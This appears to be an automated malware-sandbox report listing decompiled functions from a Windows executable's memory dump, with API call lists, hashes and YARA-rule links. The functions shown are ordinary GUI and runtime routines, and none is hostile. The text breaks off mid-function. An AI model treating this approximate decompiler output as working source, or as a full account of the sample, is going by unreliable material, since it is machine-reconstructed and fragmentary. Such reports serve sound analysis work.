Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: ce7ec5a9a682f0797289ff909420303f7e13cea0743a81b5261dbc3b0894185a
Instruction ID: 04793111fc7be30a39fe58eb12ebe0d5931bd910b9b8989f308f3dba402a2f44
Opcode Fuzzy Hash: ce7ec5a9a682f0797289ff909420303f7e13cea0743a81b5261dbc3b0894185a
Instruction Fuzzy Hash: 47313061588343AAD310D7A5A901BE23695FB60304F0880BBE484BB3C2D7BC485997AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042370C, Relevance: 6.1, APIs: 4, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042370C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00420334(_v8);
					_push(_t87);
					_push(0x4237eb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E00424A28( *((intOrPtr*)(_v8 + 0x58)));
					E00423588( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E00424C08( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E00420784(_v8, _t69);
					_t59 =  *0x476788; // 0x22106f4
					E004147C8(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x4237f2);
					return E004205D8(_v8);
				}
			}

0x0042370d
0x0042370f
0x00423712
0x00423715
0x0042371c
0x004237f6
0x00423722
0x00423725
0x0042372c
0x0042372d
0x00423732
0x00423735
0x0042373e
0x0042374f
0x0042375a
0x00423766
0x00423771
0x00423776
0x0042378c
0x00423778
0x00423782
0x00423782
0x00423798
0x0042379d
0x004237bb
0x0042379f
0x004237ab
0x004237af
0x004237af
0x004237c3
0x004237cb
0x004237d0
0x004237d7
0x004237da
0x004237dd
0x004237ea
0x004237ea

APIs

Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 0042033C
Part of subcall function 00420334: RtlLeaveCriticalSection.KERNEL32(00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420349
Part of subcall function 00420334: RtlEnterCriticalSection.KERNEL32(00000038,00492A5C,00492A5C,00000000,0041EAD2,00000000,0041EB31), ref: 00420352

Part of subcall function 00424C08: GetDC.USER32(00000000), ref: 00424C5E
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: ReleaseDC.USER32 ref: 00424CAC

CreateCompatibleDC.GDI32(00000000), ref: 00423761
SelectObject.GDI32(00000000,?), ref: 0042377A
SelectPalette.GDI32(00000000,?,000000FF), ref: 004237A3
RealizePalette.GDI32(00000000), ref: 004237AF

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: e3485f05755247b992926618fcdc622e8f3691de535f91299db2e6c53428576d
Instruction ID: 98b0743b898854cd7558453ef2d812f50123e071f21bfe59adefa0e0869b5b3e
Opcode Fuzzy Hash: e3485f05755247b992926618fcdc622e8f3691de535f91299db2e6c53428576d
Instruction Fuzzy Hash: F4310A74B04664EFDB04EF59D981D5DB3F5EF48714B6281A6F404AB362C638EE40DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00449108, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449108(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00448814(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E00448690(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E00448690(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408C90(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408BD4(_a12, _t49);
				}
			}

APIs

GetMenuState.USER32 ref: 0044912B
GetSubMenu.USER32 ref: 00449136
GetMenuItemID.USER32(?,?), ref: 0044914F
GetMenuStringA.USER32(?,?,?,?,?), ref: 004491A2

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 7d59ce4a75b46e58925364685ced3c6dc0ff2d3d6530cc81ef1e2fedc84a76e6
Instruction ID: f757e5f0d8e1f70435e9771e1cf823c58798244c1ee4a307b9815b5b9bcc76ed
Opcode Fuzzy Hash: 7d59ce4a75b46e58925364685ced3c6dc0ff2d3d6530cc81ef1e2fedc84a76e6
Instruction Fuzzy Hash: 72118E31601215AFE740EE2ECC859AF77E8AF89364B11446EF809D7381DA389D01E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0045AF04, Relevance: 6.1, APIs: 4, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045AF04(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045AE9C(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043C1F4(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045AE18(_t43);
				SetWindowPos(E0043C1F4(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045AE18(_t43);
				}
				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043C1F4(_t43));
				}
				return _t26;
			}

APIs

IsRectEmpty.USER32 ref: 0045AF0F
IsWindowVisible.USER32(00000000), ref: 0045AF3A
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B01B,0045FE64), ref: 0045AF72
SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B01B,0045FE64), ref: 0045AFA7

Part of subcall function 0045AE9C: IsWindowVisible.USER32(00000000), ref: 0045AEB3
Part of subcall function 0045AE9C: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD0E,0045FD16,?,?,0045B66C), ref: 0045AEDA
Part of subcall function 0045AE9C: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD0E,0045FD16,?,?,0045B66C), ref: 0045AEFA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$FocusVisible$EmptyRect
String ID:
API String ID: 698668684-0
Opcode ID: 2877f2ad69c9b5a78960e03bd37a5484874dabc5f16aa4b2564faba7931df6f9
Instruction ID: 57f5d61e95266162c302e8bd97bb1095e2aa755107e443e22d382ac4060c7050
Opcode Fuzzy Hash: 2877f2ad69c9b5a78960e03bd37a5484874dabc5f16aa4b2564faba7931df6f9
Instruction Fuzzy Hash: 2A11CAA23002015FC510B67A8C85A6BB3DC9F4534AB08426AFD58EB343CB2CEC15A76F

Uniqueness

Uniqueness Score: -1.00%

Function 0042291C, Relevance: 6.1, APIs: 4, Instructions: 64
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042291C(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				int _t29;
				void* _t33;
				void* _t35;
				struct HPALETTE__* _t36;
				void* _t38;
				struct HPALETTE__* _t39;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t33 = __edx;
				_t29 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
					_t39 = 0;
					if(_t36 != 0) {
						_t39 = SelectPalette(E00420704(__edx), _t36, 0xffffffff);
						RealizePalette(E00420704(_t33));
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t35 = _t33;
					_t38 = _t36;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420704(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
					if(_t38 != 0) {
						return SelectPalette(E00420704(_t35), _t39, 0xffffffff);
					}
				}
				return _t11;
			}

0x0042291c
0x00422923
0x00422926
0x00422928
0x0042292e
0x00422937
0x00422939
0x0042293d
0x0042294f
0x00422959
0x00422959
0x00422969
0x0042296a
0x0042296b
0x0042296c
0x0042296d
0x0042296e
0x0042296f
0x00422973
0x0042298b
0x00422992
0x00000000
0x0042299f
0x00422992
0x004229ab

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042294A
RealizePalette.GDI32(00000000), ref: 00422959
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042298B
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042299F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$FileMetaPlayRealize
String ID:
API String ID: 1995988871-0
Opcode ID: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction ID: f5adf016cef96925e87f4465e5f6b9b27bb554d4f64d10c9ea15436507f7d3d3
Opcode Fuzzy Hash: 54b032dc3997382d3c648a3e39e2d6cc26706bd36d5c420c9aafbc1f914f00b0
Instruction Fuzzy Hash: EE01A5B1708220ABC610AB6D9C8495BB3DDEFC5334F05473AF854E7382D679DC41CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004171B0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00417140(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416f50
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00417140(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416f50
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416a70
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416F10(_t23, _t25, _t18);
			}

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004171C7
LoadResource.KERNEL32(?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 004171E1
SizeofResource.KERNEL32(?,00416F50,?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 004171FB
LockResource.KERNEL32(00416A70,00000000,?,00416F50,?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 00417205

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 29d46a75b5a091bc257bae7ff510dddbb095a7f172de68a6d7d2c5cdc354b81a
Instruction ID: 6686bbd2eae848e43a10de4bfebf77ca25a9ad9c699b14ab91c76057114fb30b
Opcode Fuzzy Hash: 29d46a75b5a091bc257bae7ff510dddbb095a7f172de68a6d7d2c5cdc354b81a
Instruction Fuzzy Hash: 79F04BB26052047F9704FE6AA881D9B77ECEE893A4311406AF909D7306DA39DD51876C

Uniqueness

Uniqueness Score: -1.00%

Function 00401AA0, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401AA0() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B56);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4925c4);
				L004013F4();
				if( *0x492049 != 0) {
					_push(0x4925c4);
					L004013FC();
				}
				E00401464(0x4925e4);
				E00401464(0x4925f4);
				E00401464(0x492620);
				 *0x49261c = LocalAlloc(0, 0xff8);
				if( *0x49261c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49261c; // 0x781d98
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x492608)) = 0x492604;
					 *0x492604 = 0x492604;
					 *0x492610 = 0x492604;
					 *0x4925bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B5D);
				if( *0x492049 != 0) {
					_push(0x4925c4);
					L00401404();
					return 0;
				}
				return 0;
			}

0x00401aa5
0x00401aa6
0x00401aab
0x00401aae
0x00401ab1
0x00401ab6
0x00401ac2
0x00401ac4
0x00401ac9
0x00401ac9
0x00401ad3
0x00401add
0x00401ae7
0x00401af8
0x00401b04
0x00401b06
0x00401b0b
0x00401b0b
0x00401b13
0x00401b17
0x00401b18
0x00401b24
0x00401b27
0x00401b29
0x00401b2e
0x00401b2e
0x00401b37
0x00401b3a
0x00401b3d
0x00401b49
0x00401b4b
0x00401b50
0x00000000
0x00401b50
0x00401b55

APIs

RtlInitializeCriticalSection.KERNEL32(004925C4,00000000,00401B56,?,?,0040233A,022114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
RtlEnterCriticalSection.KERNEL32(004925C4,004925C4,00000000,00401B56,?,?,0040233A,022114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
LocalAlloc.KERNEL32(00000000,00000FF8,004925C4,00000000,00401B56,?,?,0040233A,022114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
RtlLeaveCriticalSection.KERNEL32(004925C4,00401B5D,00000000,00401B56,?,?,0040233A,022114A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 272ea004201329c2c01e35f47f248479118a5664eea968afa86257b441d7c045
Instruction ID: 95e3ad14cd8e77daeaecc4888ebbb2b959e38f942476f89c2b71d2eae05b4240
Opcode Fuzzy Hash: 272ea004201329c2c01e35f47f248479118a5664eea968afa86257b441d7c045
Instruction Fuzzy Hash: 2B01A1B06446407EEB1AAB2A9A16B197AA0D714704F05803BE100A6AF2E6FC5845CF2E

Uniqueness

Uniqueness Score: -1.00%

Function 00408930, Relevance: 6.0, APIs: 4, Instructions: 39
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408930(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}

0x00408931
0x00408934
0x00408950
0x00408947
0x00000000
0x00408949
0x00408949
0x00408949
0x0040898f
0x00408992
0x00408992
0x0040895d
0x0040896c
0x00408974
0x0040897a
0x00408988
0x0040898d
0x00000000

APIs

FindNextFileA.KERNEL32(?,?), ref: 00408940
GetLastError.KERNEL32(?,?), ref: 00408949
FileTimeToLocalFileTime.KERNEL32(?), ref: 0040895D
FileTimeToDosDateTime.KERNEL32 ref: 0040896C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: db27a5cef56bbba3b33402563997924791849041ba68b6d132b42de9cb14f02d
Instruction ID: e6ade6a12cc37e4ff0def18c17877ece12b579765ebcc45602a1fed6474587a8
Opcode Fuzzy Hash: db27a5cef56bbba3b33402563997924791849041ba68b6d132b42de9cb14f02d
Instruction Fuzzy Hash: DEF036B25051019FCF04FF64C9C289737DC9B4431431485B7ED45DF286EA38D55487B5

Uniqueness

Uniqueness Score: -1.00%

Function 00453ECC, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453ECC(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x492c04; // 0x2210d40
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x492c1c == 0) {
						_t2 = SetWindowsHookExA(3, E00453E88, 0, GetCurrentThreadId());
						 *0x492c1c = _t2;
					}
					if( *0x492c18 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x492c18 = _t2;
					}
					if( *0x492c20 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00453E2C, 0, 0, _t7);
						 *0x492c20 = _t2;
					}
				}
				return _t2;
			}

0x00453ecd
0x00453ed9
0x00453ee2
0x00453ef4
0x00453ef9
0x00453ef9
0x00453f05
0x00453f0f
0x00453f14
0x00453f14
0x00453f20
0x00453f33
0x00453f38
0x00453f38
0x00453f20
0x00453f3e

APIs

GetCurrentThreadId.KERNEL32 ref: 00453EE4
SetWindowsHookExA.USER32 ref: 00453EF4
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,004566FA,?,?,02210D40,?,?,00456128,?), ref: 00453F0F
CreateThread.KERNEL32(00000000,000003E8,00453E2C,00000000,00000000), ref: 00453F33

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: a029828d2ed7ef9a2133aa6c0c65927439a02c1754ce3a1a3ad1f13271e0cfd5
Instruction ID: fd2bdbd6825346d59a64741b3253542142a3dc76f22bf051d0565e67b4e4aa31
Opcode Fuzzy Hash: a029828d2ed7ef9a2133aa6c0c65927439a02c1754ce3a1a3ad1f13271e0cfd5
Instruction Fuzzy Hash: 1AF0DA71A853007EF621AF25DE47F2A36949334B5BF10413BF6047A1D3CBF856888AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00423FD0, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00423FD0(void* __eflags) {
				int _t14;
				intOrPtr _t20;
				void* _t21;

				DeleteObject( *(_t21 - 0x10));
				E00403DD0();
				E00403E24();
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x424021);
				DeleteDC( *(_t21 - 0x1c));
				_t14 = ReleaseDC(0,  *(_t21 - 0x18));
				if( *(_t21 - 0x10) != 0) {
					return GetObjectA( *(_t21 - 0x10), 0x54,  *(_t21 + 0xc));
				}
				return _t14;
			}

0x00423fd4
0x00423fd9
0x00423fde
0x00423fe5
0x00423fe8
0x00423feb
0x00423ff4
0x00423fff
0x00424008
0x00000000
0x00424014
0x00424019

APIs

DeleteObject.GDI32(?), ref: 00423FD4
DeleteDC.GDI32(?), ref: 00423FF4
ReleaseDC.USER32 ref: 00423FFF
GetObjectA.GDI32(?,00000054,?), ref: 00424014

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteObject$Release
String ID:
API String ID: 2600533906-0
Opcode ID: 1da6a4705c37b91583de7ec29b46334c79ccb9cd44601d8de0a978bef9875844
Instruction ID: 1c1ab6a449de7732c6b8ccdae0aacd61de7e6927c2f9cab643fca07f8c156af7
Opcode Fuzzy Hash: 1da6a4705c37b91583de7ec29b46334c79ccb9cd44601d8de0a978bef9875844
Instruction Fuzzy Hash: DEE03071A04115AADB00EBE5D846A7E77F8EB44305F40042AB610EB1C1C63CA840C729

Uniqueness

Uniqueness Score: -1.00%

Function 004072AC, Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072AC(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x004072af
0x004072b6
0x004072bb
0x004072c1
0x004072c6

APIs

GlobalHandle.KERNEL32 ref: 004072AF
GlobalUnWire.KERNEL32 ref: 004072B6
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 004072BB
GlobalFix.KERNEL32 ref: 004072C1

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: 92f1bc27c9634726b2f0a239413a7c54f03635f944e1005175901a3c56d1670f
Instruction ID: 259ab7e85c60211505b58427907bbc6fc2cc1ee7dc874fbd9d5750fb2c8aca08
Opcode Fuzzy Hash: 92f1bc27c9634726b2f0a239413a7c54f03635f944e1005175901a3c56d1670f
Instruction Fuzzy Hash: DEB009C4820222BCE80473B34C0BE3B289C9880B1C383497F3406B2C83987E982841BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041F414, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F414(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

